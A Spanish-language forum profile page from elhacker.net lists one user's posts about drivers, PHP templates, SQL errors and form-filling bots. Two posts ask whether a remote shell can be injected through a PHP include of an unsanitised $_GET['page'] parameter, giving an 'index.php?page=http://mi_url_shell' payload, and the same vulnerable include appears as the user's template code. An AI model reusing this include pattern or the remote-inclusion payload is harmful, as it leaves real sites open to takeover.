elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6
1  Programación / Programación C/C++ / navegar por una web enviando parametreos por c++ en: 29 Septiembre 2023, 07:55 am
es mi primer post en mcuho tiempo y ahora metiendo en souyrvec mano queria saber si hay un comano para enviar parametros port post o get ... sin que se abra el navegador o sea visible la insormfacion
2  Sistemas Operativos / Windows / Re: ayuda !! no encuentro driver en: 19 Octubre 2019, 01:50 am
gracias a todos por sus respuestas , encontre el driver , ahora lo toma por que el so era de 64 bits ahora anda en uno de 32 >:D
3  Sistemas Operativos / Windows / ayuda !! no encuentro driver en: 17 Octubre 2019, 04:56 am
hola , estoy buscando el driver de la placa d915gev ... le pase el everest y me dice que la placa es gma900 pero lo busque en internet y no lo encuentro , la pagina de intel ya no da soporte para esta placa , ni los drivers te da te ofrecen un examinador de equipo que no funciona . probe usando el driverpack mas actualizado , el iobit driver booster ,y nada ...

desde ya agradezco su colaboracion
4  Seguridad Informática / Seguridad / Re: se puede usar una shell en este codigo? en: 4 Mayo 2018, 02:26 am
no se puede alojar en una url atacante?
como podria hacerlo seguro?

algo como un if exist archivo url o algo asi
5  Seguridad Informática / Seguridad / se puede usar una shell en este codigo? en: 4 Mayo 2018, 02:21 am
hola para los que saben de Vulnerabilidades queria saber si se puede inyectar una shell en este codigo php

Código:
<?php
error_reporting(0);
if($page=""){
  include "servicios.php";
}else{
include $_GET["page"] . ".php";}
?>

donde pagina seria algo asi como index.php?page=http://mi_url_shell y interprete shell.php
6  Programación / PHP / [Resuelto] problema en include en: 12 Abril 2018, 10:46 am
hola , tengo un problema al querer usar una plantilla , va mas bien al crear una plantilla
el tema es que lo habia escrito hace un tiempo pero no se que cambio que ya no puedo hacerlo como antes

el codigo es este

Código
  1. <?php
  2. include $_GET["page"] . ".php";
  3. ?>

el tema es que devuelve 3 errores


Código:
Notice: Undefined index: servicios in /storage/ssd2/129/4459129/public_html/index.php on line 121

Warning: include(.php): failed to open stream: No such file or directory in /storage/ssd2/129/4459129/public_html/index.php on line 121

Warning: include(): Failed opening '.php' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in /storage/ssd2/129/4459129/public_html/index.php on line 121

mi idea es que seleccione una pagina .php y la muestre en el index.php y pasar por get la variable de modo que me quede

index.php?page=servicios por ejemplo , lo mismo para todas las secciones de la pagina , para que quede como plantilla el index y muestre el contenido de un archivo php dependiendo la variable que envia por ejemplo ?page=noticias
y que escriba lo que hay en noticias.php
7  Programación / Bases de Datos / error en el select en: 22 Septiembre 2017, 01:29 am
Código:
$registros=mysqli_query($conexion,"select cliente as codigo
codigo,
nombre,
direccion,
telefono,
pc,
modelo,
micro,
memoria,
problema,
presupuesto,
comentarios,
                   from cliente as cliente
                                    inner join codigo as codigo on cliente.codigo=cliente.codigo
                                    limit $inicio,2") or
  die("Problemas en el select:".mysqli_error($conexion));

me da el  siguiente error    Problemas en el select:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'codigo, nombre, direccion, telefono, ' at line 2

si alguien puede ayudarme

Citar
no se si va aca o en php es un prog que quiero correr en el celu con androphp
8  Programación / Desarrollo Web / alguien me puede ayudar con un robot en: 5 Marzo 2017, 04:15 am
hola queria preguntar si alguno tiene una idea para hacer un robot web para rellenar formularios tipo post , antes habia herramientas para desarrolladores que permitian manipular los formularios y enviar los datos por post , tambien hice control de formularios tipo robot con sendkeys de vb6 para rellenar y enviar moviendome por los controltas de los forms , pero ya no usan tbstrips por lo que no lo puedo hacer asi si alguno conoce alguna forma y puede ayudarme desde ya lo agradezco
9  Programación / Programación Visual Basic / user agent sendkeys o algo para rellenar formularios usando https en: 22 Febrero 2017, 08:09 am
hola estoy buscando alguna forma de enviar datos a traves de una pagina de internet tipo post , pero es un metodo antiguo , igual que senkeys que no sirve cuando piden usar mouse para seeccionar opciones , lo que necesito es enviar datos a una pagina para publicar anuncios de forma automatizada , lo que pasa es que dan muchas opciones y no logro conseguir alguna guia sobre https en vb que es el lenguaje que mas conozco si alguno podria ayudarme o aconsejarme estoy agradecido
10  Informática / Software / Re: Al abrir un DVD-R virgen sale este Error: "No se puede tener acceso a D:" (¿?) en: 11 Febrero 2017, 05:04 am
es por el programa q usas para grabar , te recomiendo ultra iso , o formatear ;-)
Páginas: [1] 2 3 4 5 6
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines